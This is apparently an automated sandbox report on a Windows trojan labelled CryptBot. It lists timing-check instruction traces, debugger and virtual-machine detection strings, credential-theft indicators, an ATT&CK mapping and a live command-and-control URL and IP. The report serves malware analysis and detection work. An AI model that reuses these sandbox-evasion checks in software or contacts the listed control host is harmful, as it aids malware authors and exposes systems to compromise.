Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141695 second address: 71416AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F73h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416AC second address: 71416B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416B0 second address: 71416CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75199F70h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416CE second address: 71416D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416D4 second address: 71416D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416D8 second address: 71416F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA75194B4Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71416F0 second address: 714170D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714170D second address: 714171D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714171D second address: 7141730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, 2F9Fh 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141730 second address: 7141736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141736 second address: 714173A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714173A second address: 714173E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714173E second address: 714175B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA75199F72h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190C61 second address: 7190C67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190C67 second address: 7190C78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190C78 second address: 7190C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190C7C second address: 7190CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FEA75199F6Ah 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEA75199F77h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CAB second address: 7190CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov di, C266h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA75194B58h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CD3 second address: 7190CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CE5 second address: 7190CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CF4 second address: 7190CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CF8 second address: 7190CFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7190CFC second address: 7190D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71307A1 second address: 71307A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71307A5 second address: 71307A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71307A9 second address: 71307AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71307AF second address: 71307B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71307B6 second address: 7130811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FEA75194B56h 0x0000000f sbb cx, FCA8h 0x00000014 jmp 00007FEA75194B4Bh 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FEA75194B56h 0x00000022 add cx, EF08h 0x00000027 jmp 00007FEA75194B4Bh 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7130811 second address: 7130866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEA75199F6Bh 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FEA75199F76h 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 jmp 00007FEA75199F6Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D002B second address: 70D0032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 1Ch 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D0032 second address: 70D0067 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F72h 0x00000009 sbb eax, 011F1D58h 0x0000000f jmp 00007FEA75199F6Bh 0x00000014 popfd 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D0067 second address: 70D007E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D007E second address: 70D0084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D0084 second address: 70D00BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b movsx edi, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FEA75194B54h 0x00000016 sbb cx, 0148h 0x0000001b jmp 00007FEA75194B4Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D05BD second address: 70D05E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEA75199F76h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D05E9 second address: 70D05EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 70D05EF second address: 70D0609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSpecial instruction interceptor: First address: 170A407 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSpecial instruction interceptor: First address: 1795630 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01079980 rdtsc 0_2_01079980
Source: C:\Users\user\Desktop\FIyDwZM4OR.exe TID: 6888Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00E929FF
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_00E9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00E9255D
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: FIyDwZM4OR.exeBinary or memory string: Hyper-V RAW
Source: FIyDwZM4OR.exe, 00000000.00000003.1776066218.00000000009C2000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776675480.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000002.1797842430.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776283870.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FIyDwZM4OR.exe, 00000000.00000003.1714678002.0000000000972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: FIyDwZM4OR.exe, 00000000.00000003.1716250220.00000000069A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_07170138 Start: 0717069D End: 071701BC0_2_07170138
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: NTICE
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: SICE
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeCode function: 0_2_01079980 rdtsc 0_2_01079980
Source: FIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]Program Manager
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 81.29.149.125:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
FIyDwZM4OR.exe60%VirustotalBrowse
FIyDwZM4OR.exe66%ReversingLabsWin32.Trojan.CryptBot
FIyDwZM4OR.exe100%AviraTR/Crypt.TPM.Gen
FIyDwZM4OR.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
81.29.149.125
truefalse
    		high
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high
      httpbin.org
      		3.218.7.103
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmlFIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://html4/loose.dtdFIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/alt-svc.html#FIyDwZM4OR.exefalse
                    		high
                    https://httpbin.org/ipbeforeFIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.htmlFIyDwZM4OR.exe, FIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#FIyDwZM4OR.exefalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSFIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            https://curl.se/docs/http-cookies.html#FIyDwZM4OR.exefalse
                              		high
                              https://curl.se/docs/alt-svc.htmlFIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.cssFIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=FIyDwZM4OR.exe, 00000000.00000003.1776258710.00000000009C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://.jpgFIyDwZM4OR.exe, 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmp, FIyDwZM4OR.exe, 00000000.00000003.1684411352.00000000073B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    81.29.149.125
                                    		home.fiveth5ht.topSwitzerland
                                    		39616COMUNICA_IT_SERVICESCHfalse
                                    3.218.7.103
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581622
                                    Start date and time:2024-12-28 09:59:21 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:2
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FIyDwZM4OR.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:81faa857e0e440955735ed78a8c61ddd.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • Exclude process from analysis (whitelisted): SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    04:00:20API Interceptor3x Sleep call for process: FIyDwZM4OR.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    81.29.149.125ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
